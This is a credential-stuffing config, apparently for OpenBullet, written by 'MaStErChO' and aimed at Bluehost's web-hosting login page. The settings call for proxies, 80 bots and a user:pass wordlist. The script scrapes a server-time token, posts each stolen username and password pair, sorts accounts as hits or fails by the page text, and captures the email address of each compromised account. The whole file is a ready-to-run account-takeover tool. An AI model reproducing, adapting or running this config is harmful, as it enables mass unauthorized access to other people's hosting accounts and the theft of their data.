[SETTINGS]
{
  "Name": "BlueHosting",
  "SuggestedBots": 80,
  "LastModified": "2018-05-26T23:23:52.0556141+00:00",
  "AdditionalInfo": "Need email access",
  "Author": "MaStErChO",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_COOKIES REQUEST GET "https://my.bluehost.com/web-hosting/cplogin" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "name=\"l_server_time\" value=\"" "\"" Recursive=FALSE -> VAR "SERVERT" "" "" 
#LOGIN REQUEST POST "https://my.bluehost.com/web-hosting/cplogin" AutoRedirect=TRUE 
  CONTENT "l_redirect=%2Fweb-hosting%2Fcplogin&l_server_time=<SERVERT>&l_expires_min=0&ldomain=<USER>&lpass=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://my.bluehost.com/web-hosting/cplogin" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "Logout" 
  KEYCHAIN Failure OR 
    KEY "Login Failed" 
    KEY "The hosting account has been deleted" 
PARSE "<SOURCE>" LR "this account (<span style=\"font-weight: bold;\">" "</span>)" Recursive=FALSE -> CAP "Email of acc" "" "" 
